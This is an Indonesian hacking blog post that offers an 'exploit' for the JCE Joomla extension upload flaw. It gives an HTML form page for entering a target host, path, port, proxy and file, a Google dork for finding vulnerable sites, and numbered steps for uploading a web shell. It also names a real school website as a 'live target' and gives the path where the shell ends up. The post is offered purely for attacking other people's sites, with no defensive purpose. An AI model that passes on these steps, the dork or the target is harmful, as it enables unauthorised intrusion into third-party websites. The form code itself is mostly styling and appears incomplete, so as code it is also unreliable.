Posted by : Ham JavaNet Minggu, 12 Mei 2013

Assalamualaikum , saya Sandy-x207 mau share Exploit JCE nih
Oke langsung TKP !

Copas dulu script ini,

<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<style type"text/css">
body {
background:#e1e1e1;
font-family: orbitron;
padding:4;
width:98%;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
#header {
color:#00FF00;
text-align:center;
text-shadow:1px 2px 3px #0000FF;
font-size:30px;
}
.tablenya{
}
.atas1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 0 0 0;
-moz-border-radius: 6px 0 0 0;
border-radius: 6px 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.atas2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 6px 0 0;
-moz-border-radius: 0 6px 0 0;
border-radius: 0 6px 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.tengah1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.tengah2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.required {
text-align:right;
color:#FF0000;
position:fixed;
right:3%;
}
input {
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.start {
text-align:center;
color:#FF0000;
}
#footer {
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 6px 6px;
-moz-border-radius: 0 0 6px 6px;
border-radius: 0 0 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
/*NoScript*/
#enjs {z-index: 999;position:fixed;top:0;left:0;width:100%;height:100%;background-color:#000;margin:0;padding:0;}
#enjs p {margin:0;padding:0;width:100%;color:#333;position:relative;top:40%;font:bold 18px/20px arial;text-align:center;text-shadow:none;}
/*ScrollBar */
::-webkit-scrollbar {width: 12px;}
::-webkit-scrollbar-track {background:rgb(71, 71, 71);}
::-webkit-scrollbar-thumb, ::-webkit-scrollbar-thumb:window-inactive { background: rgb(34, 34, 34); }
#loading-overlay {position:fixed;top:0;left:0;right:0;bottom:0;background:#000000;z-index:999999;text-align:center;width:100%;height:100%;padding-top:22%;color:#FF0000;}
.ball {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-right:5px solid transparent;border-left:5px solid transparent;border-radius:50px;box-shadow: 0 0 35px rgb(255 ,0 , 0);width:50px;height:50px;margin:0 auto;-moz-animation:spinPulse 1s infinite ease-in-out;-webkit-animation:spinPulse 1s infinite linear;}
.ball1 {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-left:5px solid transparent;border-right:5px solid transparent;border-radius:50px;box-shadow: 0 0 15px rgb(255 ,0 , 0);width:30px;height:30px;margin:0 auto;position:relative;top:-50px;-moz-animation:spinoffPulse 1s infinite linear;-webkit-animation:spinoffPulse 1s infinite linear;}
@-moz-keyframes spinPulse {0% { -moz-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)}50% { -moz-transform:rotate(145deg); opacity:1; }100% { -moz-transform:rotate(-320deg); opacity:0; }}
@-moz-keyframes spinoffPulse {0% { -moz-transform:rotate(0deg); } 100% { -moz-transform:rotate(360deg); }}
@-webkit-keyframes spinPulse {0% { -webkit-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)} 50% { -webkit-transform:rotate(145deg); opacity:1;} 100% { -webkit-transform:rotate(-320deg); opacity:0; }}
@-webkit-keyframes spinoffPulse {0% { -webkit-transform:rotate(0deg); } 100% { -webkit-transform:rotate(360deg); }}
</style>
</head>
<body>
<div id="header">-=[ JCE Joomla Extension Remote File Upload ]=-</div><br>
<form name="form1" action="" enctype="multipart/form-data" method="post">
<table class="tabelnya">
<tr>
<td class="atas1">hostname (ex:www.sitename.com):</td>
<td class="atas2"><input name="host" size="90"> *</td>
</tr>
<tr>
<td class="tengah1">path (ex: /joomla/ or just / ):</td>
<td class="tengah2"><input name="path" size="90"> *</td>
</tr>
<tr>
<td class="tengah1">Please specify a file to upload:</td>
<td class="tengah2"><input type="file" name="datafile" size="88"> *</td>
</tr>
<tr>
<td class="tengah1">specify a port (default is 80):</td>
<td class="tengah2"><input name="port" size="90"></td>
</tr>
<tr>
<td class="tengah1">Proxy (ip:port):</td>
<td class="tengah2"><input name="proxy" size="90"></td>
</tr>
</table>
<div id="footer">
<div class="required">*fields are required</div>
<br>
<div class="start"><input type="submit" value="Start" name="Submit"></div>
<br>
</div>
</form>
<div class="start">&copy 2013 ShadoWNamE</div>
<div id="loading-overlay">
<div class="ball"></div>
<div class="ball1"></div>
<h3>Loading..............</h3>
</div>
<script>
// hilangkan overlay dengan efek .fadeOut() jika keseluruhan halaman telah selesai dimuat
$(window).bind("load", function() {
$("#loading-overlay").fadeOut();
});
</script>
</body></html>



Dork :
inurl:index.php?option=com_jce
 1.  Simpan dalam ekstensi php lalu upload ke website [mau website mana kek terserah :p]



2. Masukan Dork Ke Google

3. Keluar tuh Banyak Website, Coba 1-1 yah :D , Tapi Saya Disini Sudah Punya Live Target
www.saintpatricktemuco.cl

4. Masukan Url Site nya Ke " hostname (ex:www.sitename.com): " ,
Contoh : www.saintpatricktemuco.cl ( tanpa http:// dan / )

5. Di Path : path (ex: /joomla/ or just / ):
Contoh : www.site.com/joomla/ ( Untuk Path bisa gunakan /joomla/ atau kalau di website tidak mempunyai path bisa gunakan / saja )

6. Pilih shell yang ingin kalian upload

7. Klik Start !

8. Akses di localhost/images/stories/shell.php

Source : Arsyad-Cyber

Description: Exploit JCE Joomla Extension | Upload Vulnerability
Rating: 4.5
Reviewer: Ham JavaNet
ItemReviewed: Exploit JCE Joomla Extension | Upload Vulnerability

Leave a Reply

Monggo Tinggalkan Jejak Kaks :)

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

Popular Post

Labels

Arsip Blog

Followers

- Copyright © 2013 shad0w-share | Designed by Johanes Djogan -